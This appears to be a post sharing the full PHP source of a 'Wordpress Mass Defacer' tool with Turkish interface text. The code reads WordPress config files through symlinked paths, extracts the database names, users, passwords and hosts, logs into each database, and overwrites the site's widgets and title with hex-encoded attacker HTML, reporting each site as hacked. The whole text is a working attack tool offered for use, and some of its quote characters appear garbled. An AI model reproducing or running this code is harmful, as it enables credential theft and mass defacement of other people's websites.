Wp indexer

1. PHP Kod:
2. <!DOCTYPE html PUBLIC --//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
4. <head>
5. <***** http-equiv="Content-Type" content="text/html;charset=UTF-8" />
6.  
7. <title>Wordpress Mass Defacer 1.0</title>
8. <style type="text/css">
9. body{
10. background-color:#000;
11. color:green;
12.  
13. }
14. .logo {
15. color:white;
16. margin-bottom:10px;
17.  
18. width:auto;
19. height:60px;
20. position: relative;
21.  
22. }
23. .configler
24. {
25. position: relative;
26. margin: auto;
27. }
28. .footer
29. {
30. position: relative;
31. margin: auto;
32. }
33. .footer{
34. color:white;
35. font-family:Comic Sans Ms;
36. position: relative;
37. margin: auto;
38.  
39. }
40. .logo h1{
41. font-size:40px;
42. font-family:Comic Sans Ms;
43. border:2px dotted ;
44. border-color:orange;
45. color:green;
46. }
47.  
48. .textarea
49. {
50. border:solid 1px;
51. border-color:Orange;
52. width:600px;
53. height:300px;
54. color: red;
55. background-color: Black;
56. resize:none;
57.  
58. }
59.  
60. .configler input
61. {
62. width:400px;
63. color: red;
64. background-color: Black;
65. border:1px solid;
66. border-color:orange;
67. }
68. .configler button
69. {
70. width:300px;
71. height:50px;
72. font-size:20px;
73. color:Green;
74. background-color: Black;
75. border:2px dotted ;
76. border-color:Red;
77. }
78. .configler font
79. {
80. font-size:20px;
81. color:green;
82. }
83. .configler textarea
84. {
85. width:400px;
86. height:200px;
87.  
88. color:red;
89. background-color: Black;
90. border:1px solid ;
91. border-color:orange;
92. resize:none;
93. }
94. </style>
95. </head>
96.  
97. <body>
98.  
99. <div class="logo">
100. <center><h1>Wordpress Mass Deface 1.0</h1></center>
101. </div>
102. <form action=-#- method="POST">
103. <div class="configler">
104.  
105.  
106. <center><font color=-->Symlink Yol</center><center></font><input type="text" name="configyol"/></center>
107. <center><font color=-->İndex</center><center></font><textarea name="index" id="index" cols="30" rows="10"></textarea></center><br>
108. <center><button type="submit">Bas Gitsin Amua!</button></center>
109.  
110. </div>
111. </form>
112. <br>
113.  
114. <?php
115. if($_POST)
116. {
117. $url=$_POST['configyol'];
118. $users=@file($url);
119.  
120.  
121. if (count($users)<1) exit(-<center><font color='Green'><h1>Config Bulunamadı!!</h1></font></center>-);
122. foreach ($users as $user) {
123. $user1=trim($user);
124. $code=file_get_contents2($user1);
125. preg_match_all(-|define.*\(.*\'DB_NAME\-.*,.*\-(.*)\-.*\).*;|isU',$code,$b1);
126. $db=$b1[1][0];
127. preg_match_all(-|define.*\(.*\'DB_USER\-.*,.*\-(.*)\-.*\).*;|isU',$code,$b2);
128. $user=$b2[1][0];
129. preg_match_all(-|define.*\(.*\'DB_PASSWORD\-.*,.*\-(.*)\-.*\).*;|isU',$code,$b3);
130. $db_password=$b3[1][0];
131. preg_match_all(-|define.*\(.*\'DB_HOST\-.*,.*\-(.*)\-.*\).*;|isU',$code,$b4);
132. $host=$b4[1][0];
133. preg_match_all(-|\$table_prefix.*=.*\-(.*)\-.*;|isU',$code,$b5);
134. $p=$b5[1][0];
135.  
136.  
137. $d=@mysqli_connect( $host, $user, $db_password ) ;
138. if ($d){
139. @mysqli_select_db($d,$db );
140. $source=stripslashes($_POST['index']);
141. $s2=strToHex(($source));
142. $s=-<script>document.documentElement.innerHTML = unescape(--$s2'-);</script>-;
143. $ls=strlen($s)-2;
144. $sql="update -.$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\-;s:0:\-\-;s:4:\"text\-;s:$ls:\-$s\-;s:6:\"filter\-;b:0;}s:12:\"_multiwidget\-;i:1;}- where option_name='widget_text'; -;
145. mysqli_query($d,$sql) ;
146. $sql="update -.$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\-;a:6:{i:0;s:10:\"archives-2\-;i:1;s:6:\-*****-2\-;i:2;s:8:\"search-2\-;i:3;s:12:\"categories-2\-;i:4;s:14:\"recent-posts-2\-;i:5;s:17:\"recent-comments-2\-;}s:9:\"sidebar-1\-;a:1:{i:0;s:6:\"text-2\-;}s:9:\"sidebar-2\-;a:0:{}s:9:\"sidebar-3\-;a:0:{}s:9:\"sidebar-4\-;a:0:{}s:9:\"sidebar-5\-;a:0:{}s:13:\"array_version\-;i:3;}- where option_name='sidebars_widgets';-;
147. mysqli_query($d,$sql) ;
148. if (function_exists("mb_convert_encoding") )
149. {
150. $source2 = mb_convert_encoding(-</title>-.$source.-<DIV style="DISPLAY: none"><xmp>-, 'UTF-8');
151. $source2=mysqli_real_escape_string($d,$source2);
152. $sql = "UPDATE `-.$p."options` SET `option_value` = -$source2' WHERE `option_name` = 'blogname';-;
153. @mysqli_query($d,$sql) ; ;
154. $sql= "UPDATE `-.$p."options` SET `option_value` = 'UTF-8' WHERE `option_name` = 'blog_charset';-;
155. @mysqli_query($d,$sql) ; ;
156. }
157. $aa=@mysqli_query($d,"select option_value from `-.$p."options` WHERE `option_name` = 'siteurl';-) ;;
158. $siteurl=mysqli_fetch_array($aa) ;
159.  
160. $siteurl=$siteurl['option_value'];
161. $tr=--;
162. $tr=$tr.-$siteurl";
163. mysqli_close($d);
164.  
165. }
166. if ($tr) echo -<center><font color='Green'>$tr-->Hacklendi!<br></font></center>-;
167. }
168.  
169. }
170.  
171. function strToHex($string)
172. {
173. $hex=--;
174. for ($i=0; $i < strlen($string); $i++)
175. {
176. if (strlen(dechex(ord($string[$i])))==1){
177. $hex .=-%0". dechex(ord($string[$i]));
178. }
179. else
180. {
181. $hex .=-%-. dechex(ord($string[$i]));
182. }
183. }
184. return $hex;
185. }
186.  
187. function file_get_contents2($u){
188.  
189. $ch = curl_init();
190. curl_setopt($ch,CURLOPT_URL,$u);
191. curl_setopt($ch, CURLOPT_HEADER, 0);
192. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
193. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 -);
194. $result = curl_exec($ch);
195. return $result ;
196. }
197. ?>
198. <div class="footer">
199. <center><h4>Coded By Arsle - Janissaries.org</h4></center>
200. </div>
201. </body>
202. </html>